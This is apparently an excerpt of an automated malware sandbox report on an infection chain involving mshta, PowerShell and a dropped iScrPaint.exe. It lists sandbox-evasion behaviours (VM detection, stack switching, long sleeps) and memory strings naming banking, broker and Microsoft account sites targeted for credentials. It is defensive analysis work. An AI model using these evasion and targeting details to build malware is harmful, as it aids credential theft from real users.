                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 940, type: MEMORYSTR
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Windows\SysWOW64\explorer.exeSystem information queried: FirmwareTableInformation
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\iScrPaint.exeAPI/Special instruction interceptor: Address: 6BA47C44
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeAPI/Special instruction interceptor: Address: 6BA47C44
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeAPI/Special instruction interceptor: Address: 6BA47945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BA43B54
                      Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: CEA317
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1860Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1542Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4852Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4904Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\umffwoglbibJump to dropped file
                      Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]Jump to dropped file
                      Source: C:\Users\user\iScrPaint.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_16-1529
                      Source: C:\Users\user\iScrPaint.exeAPI coverage: 0.0 %
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeAPI coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5548Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 4084Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,15_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_00402B79
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2662930967.0000000005F34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                      Source: mshta.exe, 00000005.00000003.2667650718.000001BB90B1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677303242.000001BB90BC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2674922621.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2665496381.000001BB90BAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2672513953.000001BB90B1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2675038959.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2667650718.000001BB90B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2677050404.000001BB90B1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2662930967.0000000005F34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: YNVMware
                      Source: mshta.exe, 00000005.00000003.2675113589.000001BB90BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: iScrPaint.exe, 00000011.00000002.2401973756.000000006B968000.00000008.00000001.01000000.00000014.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                      Source: mshta.exe, 00000005.00000002.2679004868.000001C393730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: explorer.exe, 00000015.00000002.2840914690.000000000306C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: svchost.exe, 00000006.00000002.3281339549.000002085C22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: iScrPaint.exe, 00000010.00000002.2340785230.000000006C2D8000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: $l.?AVQEmulationPaintEngine@@
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: iScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mvmware
                      Source: explorer.exe, 00000015.00000003.2663156554.0000000005EBB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: iScrPaint.exe, iScrPaint.exe, 00000011.00000002.2401973756.000000006B968000.00000008.00000001.01000000.00000014.sdmp, WebUI.dll.15.drBinary or memory string: .?AVQEmulationPaintEngine@@
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\iScrPaint.exeCode function: 16_2_6C06B4E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C06B4E4
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,15_2_00406D5D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
